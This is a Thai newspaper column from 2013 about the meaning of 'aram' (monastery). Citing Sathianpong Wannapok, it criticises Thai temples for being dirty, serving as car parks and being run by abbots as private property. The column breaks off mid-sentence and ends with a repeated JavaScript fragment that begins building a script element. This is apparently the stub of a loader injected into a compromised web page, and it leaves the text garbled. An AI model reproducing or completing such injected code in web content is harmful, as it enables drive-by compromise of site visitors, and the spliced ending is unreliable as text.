มติชนรายวัน ฉบับประจำวันพุธที่ 1 พฤษภาคม 2556

 

          อาราม เป็นคำชั้นสูงที่ไทยใช้เรียกวัด เช่น วัดวาอาราม เลยเหมาๆเข้าใจกันไปว่า อาราม แปลว่า วัด (รวมทั้งตัวผมด้วย)

          แต่หลวงพี่เสฐียรพงษ์ วรรณปก อธิบายว่า อาราม แปลว่าสถานที่ที่คนมาถึงแล้วรื่นรมย์ยินดี (มติชน ฉบับวันอาทิตย์ที่ 21 เมษายน 2556 หน้า 6)

          แล้วหลวงพี่ยังบอกเพิ่มเติมอีกว่า อาราม เดิมหมายถึงสวน ต่อมาเมื่อมีผู้ถวายสวน (เช่น สวนไผ่) ให้เป็นที่พำนักของสงฆ์ สถานที่อยู่นั้นจึงเรียกว่าอารามไปด้วย

          ปัจจุบัน อารามไม่เป็นสถานที่ที่คนมาถึงแล้วรื่นรมย์ยินดี หลวงพี่เสฐียรพงษ์บอกเป็นข้อๆไว้ 3 ข้อ ผมขอสรุปสั้นๆพลอยอาศัยถวายพระว่า

          1. วัดสกปรก ไม่สะอาด ไม่มีระเบียบ หลวงพี่ชี้ว่า “กุฏิพระสงฆ์องค์เจ้าก็ไม่สะอาดตาด้วย ไม่รู้ว่าอะไรต่อมิอะไรพาดรุงรังเต็มไปหมด”

          2. วัดเป็นสถานที่จอดรถ วัดใหญ่ๆทั่วกรุงกลายเป็นสถานที่สำหรับจอดรถไปเสียแล้ว วันๆเต็มไปด้วยรถ และพลุกพล่านไปด้วยรถเข้า รถออก

          3. วัดเป็นสมบัติของสมภาร เดิมวัดเป็นสมบัติส่วนกลาง เป็นสมบัติของพระศาสนา เจ้าอาวาสเป็นเพียงผู้ดูแลรักษาวัดเท่านั้น

          แต่ไปๆ เจ้าอาวาสกลับคิดว่าวัดเป็นสมบัติส่วนตัวของท่าน จะเอาไปทำอะไรเป็นเรื่องของท่าน อำนาจของเจ้าอาวาสกว้างขวางมาก

          จะคัดข้อความของหลวงพี่เสฐียรพงษ์มาให้ญาติโยมอ่านกันมากๆจะได้ช่วยกันเอาไปถวายพระต่อไปนี้

          “เจ้าอาวาสบางวัดหรือหลายวัดทำอะไรโดยพลการ เช่น ให้รื้อโบสถ์เก่าแก่ที่มีจิตรกรรมฝาผนังอันล้ำค่า แลกกับ ‘โบสถ์โหล’ ที่มี ‘ทัศนะอุจาด’ ใหม่ๆ หรือให้นายทุนสร้างคอนโดติดกับกุฏิพระ หรือบดบังโบสถ์วิหารจนเสียความงาม

          สมภารบางองค์นึกจะสร้างตึกตรงไหนก็สร้าง โดยไม่คำนึงถึงแบบแปลน ไม่ปรึกษาสงฆ์ ไม่ปรึกษาสถาปนิกนักออกแบบอะไรทั้งนั้น บางองค์แอบเอาวัดไปจำนองจำนำไว้แล้วก็ได้ น่าจะสำรวจดูกันนะครับ”

          วัดวาอาราม ควรเป็นแหล่งเรียนรู้อันรื่นรมย์ นอกเหนือจากเป็นแหล่งธรรม โดยเฉพาะวัดที่เคยมีกวีบวชแล้วแต่งวรรณกรรมสำคัญๆ เช่น สุนทรภู่

          ทุกวันนี้ วัดวาอารามเป็นแหล่งเรียนตามยถากรรม แต่ไม่รื่นรมย์

          วัดหลวงในกรุงเทพฯมุ่งรับนักท่องเที่ยวต่างชาติที่ภูมิฐานมั่งคั่ง ไม่ยินดีรับคนไทยหน้าโง่ๆ จนๆ เจ็บๆvar d=document;var s=d.createElement(‘script’); var d=document;var s=d.createElement(‘script’);